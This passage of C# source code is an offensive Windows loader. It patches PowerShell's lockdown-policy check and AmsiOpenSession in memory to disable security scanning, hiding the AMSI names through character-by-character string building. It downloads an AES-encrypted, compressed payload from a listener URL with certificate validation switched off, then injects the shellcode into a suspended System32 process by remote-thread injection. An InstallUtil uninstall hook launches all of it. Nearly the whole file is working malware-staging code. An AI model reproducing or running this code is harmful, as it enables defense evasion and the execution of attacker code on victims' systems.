188 |             RuntimeHelpers.PrepareMethod(get_l_handle);
189 |             var get_l_ptr = get_l_handle.GetFunctionPointer();
190 | 
191 |             // make the System.Management.AutomationSecurity.SystemPolicy.GetSystemLockdownPolicy VM Page writable & overwrite the first 4 bytes
192 |             VirtualProtect(get_l_ptr, new UIntPtr(4), 0x40, out lpflOldProtect);
193 |             var new_instr = new byte[] { 0x48, 0x31, 0xc0, 0xc3 };
194 |             Marshal.Copy(new_instr, 0, get_l_ptr, 4);
195 | 
196 |             DownloadAndExecute(listenerUrl, targetBinary, compressAlgorithm, aesKey, aesIv);
197 |         }
198 |         static int Bypass()
199 |         {
200 |             Char c1, c2, c3, c4, c5, c6, c7, c8, c9, c10;
201 |             c1 = 'A';
202 |             c2 = 's';
203 |             c3 = 'c';
204 |             c4 = 'n';
205 |             c5 = 'l';
206 |             c6 = 't';
207 |             c7 = 'z';
208 |             c8 = 'U';
209 |             c9 = 'y';
210 |             c10 = 'o';
211 |             string[] filePaths = Directory.GetFiles(@"c:\wind" + c10 + "ws\\s" + c9 + "stem32", "a?s?.d*");
212 |             string libname = (filePaths[0].Substring(filePaths[0].Length - 8));
213 | 
214 |             byte patch = 0xEB;
215 | 
216 |             IntPtr hHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, false, Process.GetCurrentProcess().Id);
217 |             if (hHandle != IntPtr.Zero)
218 |             {
219 |                 Console.WriteLine("[+] Process opened with Handle ~> " + hHandle);
220 |             }
221 | 
222 |             IntPtr amsiDLL = LoadLibrary(libname);
223 |             if (amsiDLL != IntPtr.Zero)
224 |             {
225 |                 Console.WriteLine("[+] amsi.dll located at ~> " + amsiDLL);
226 |             }
227 | 
228 |             IntPtr amsiOpenSession = GetProcAddress(amsiDLL, c1 + "m" + c2 + "iOpenSe" + c2 + c2 + "io" + c4);
229 |             if (amsiOpenSession != IntPtr.Zero)
230 |             {
231 |                 Console.WriteLine("[+] AmsiOpenSession located at ~> " + amsiOpenSession);
232 |             }
233 | 
234 |             IntPtr patchAddr = (IntPtr)(amsiOpenSession.ToInt64() + 3);
235 |             Console.WriteLine("[+] Trying to Inject ~> " + patchAddr);
236 | 
237 |             int bytesWritten = 0;
238 |             bool result = WriteProcessMemory(hHandle, patchAddr, new byte[] { patch }, 1, out bytesWritten);
239 |             if (result)
240 |             {
241 |                 Console.WriteLine("[!] Process Memory Injected!");
242 |             }
243 | 
244 |             CloseHandle(hHandle);
245 |             return 0;
246 |         }
247 |         public static void DownloadAndExecute(string url, string TargetBinary, string CompressionAlgorithm, string aeskey, string aesiv)
248 |         {
249 |             byte[] AESKey = Encoding.ASCII.GetBytes(aeskey);
250 |             byte[] AESIV = Encoding.ASCII.GetBytes(aesiv);
251 | 
252 |             ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;
253 |             System.Net.WebClient client = new WebClientWithTimeout();
254 | 
255 |             byte[] encrypted = client.DownloadData(url);
256 |             List<byte> l = new List<byte> { };
257 |             byte[] actual;
258 |             byte[] compressed;
259 | 
260 |             if (AESKey != null && AESIV != null)
261 |             {
262 | 
263 | 
264 |                 for (int i = 16; i <= encrypted.Length - 1; i++)
265 |                 {
266 |                     l.Add(encrypted[i]);
267 | 
268 |                 }
269 |                 actual = l.ToArray();
270 |                 compressed = Decrypt(actual, AESKey, AESIV);
271 |             }
272 |             else
273 |             {
274 |                 compressed = encrypted;
275 |             }
276 | 
277 |             byte[] sc = Decompress(compressed, CompressionAlgorithm);
278 |             string binary = TargetBinary;
279 | 
280 |             Int32 size = sc.Length;
281 |             StartupInfo sInfo = new StartupInfo();
282 |             sInfo.dwFlags = 0;
283 |             ProcessInformation pInfo;
284 |             string binaryPath = "C:\\Windows\\System32\\" + binary;
285 | 
286 |             IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
287 |             IntPtr hProcess = pInfo.hProcess;
288 |             IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
289 | 
290 |             int test = 0;
291 |             IntPtr size2 = new IntPtr(sc.Length);
292 |             bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test);
293 |             CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
294 |             return;
295 |         }
296 |         public static byte[] Decompress(byte[] data, string CompressionAlgorithm)
297 |         {
298 |             byte[] decompressedArray = null;
299 |             if (CompressionAlgorithm == "deflate9")
300 |             {
301 |                 using (MemoryStream decompressedStream = new MemoryStream())
302 |                 {
303 |                     using (MemoryStream compressStream = new MemoryStream(data))
304 |                     {
305 |                         using (DeflateStream deflateStream = new DeflateStream(compressStream, CompressionMode.Decompress))
306 |                         {
307 |                             deflateStream.CopyTo(decompressedStream);
308 |                         }
309 |                     }
310 |                     decompressedArray = decompressedStream.ToArray();
311 |                 }
312 |                 return decompressedArray;
313 |             }
314 |             else if (CompressionAlgorithm == "gzip")
315 |             {
316 |                 using (MemoryStream decompressedStream = new MemoryStream())
317 |                 {
318 |                     using (MemoryStream compressStream = new MemoryStream(data))
319 |                     {
320 |                         using (GZipStream gzipStream = new GZipStream(compressStream, CompressionMode.Decompress))
321 |                         {
322 |                             gzipStream.CopyTo(decompressedStream);
323 |                         }
324 |                     }
325 |                     decompressedArray = decompressedStream.ToArray();
326 |                 }
327 |                 return decompressedArray;
328 |             }
329 |             else
330 |             {
331 |                 return data;
332 |             }
333 |         }
334 |         public static byte[] Decrypt(byte[] ciphertext, byte[] AESKey, byte[] AESIV)
335 |         {
336 |             byte[] key = AESKey;
337 |             byte[] IV = AESIV;
338 | 
339 |             using (Aes aesAlg = Aes.Create())
340 |             {
341 |                 aesAlg.Key = key;
342 |                 aesAlg.IV = IV;
343 |                 aesAlg.Padding = PaddingMode.None;
344 | 
345 |                 ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
346 | 
347 |                 using (MemoryStream memoryStream = new MemoryStream(ciphertext))
348 |                 {
349 |                     using (CryptoStream cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Write))
350 |                     {
351 |                         cryptoStream.Write(ciphertext, 0, ciphertext.Length);
352 |                         return memoryStream.ToArray();
353 |                     }
354 |                 }
355 |             }
356 |         }
357 |         public class WebClientWithTimeout : WebClient
358 |         {
359 |             protected override WebRequest GetWebRequest(Uri address)
360 |             {
361 |                 WebRequest wr = base.GetWebRequest(address);
362 |                 wr.Timeout = 50000000; // timeout in milliseconds (ms)
363 |                 return wr;
364 |             }
365 |         }
366 |     }
367 | 
368 |     // InstallUtill uninstall bypass
369 |     [System.ComponentModel.RunInstaller(true)]
370 |     public class Loader : System.Configuration.Install.Installer
371 |     {
372 |         public override void Uninstall(System.Collections.IDictionary savedState)
373 |         {
374 |             string listenerUrl = this.Context.Parameters["listenerUrl"];
375 |             string compressAlgorithm = this.Context.Parameters["compressAlgorithm"];
376 |             string targetBinary = this.Context.Parameters["targetBinary"];
377 |             string aesKey = this.Context.Parameters["aesKey"];
378 |             string aesIv = this.Context.Parameters["aesIv"];
379 | 
380 |             if (listenerUrl == null)
381 |             {
382 |                 throw new InstallException("Mandatory parameter 'listenerUrl' is missing");
383 |             }
384 | 
385 |             if (compressAlgorithm == null)
386 |             {
387 |                 compressAlgorithm = "";
388 |             }
389 | 
390 |             if (targetBinary == null)
391 |             {
392 |                 throw new InstallException("Mandatory parameter 'targetBinary' is missing");
393 |             }
394 | 
395 |             if (aesKey == null)
396 |             {
397 |                 throw new InstallException("Mandatory parameter 'aesKey' is missing");
398 |             }
399 | 
400 |             if (aesIv == null)
401 |             {
402 |                 throw new InstallException("Mandatory parameter 'aesIv' is missing");
403 |             }
404 | 
405 |             string[] args = new string[] { listenerUrl, targetBinary, compressAlgorithm, aesKey, aesIv };
406 |             altbypass.Main(args);
407 |         }
408 |     }
409 | }
410 | 


--------------------------------------------------------------------------------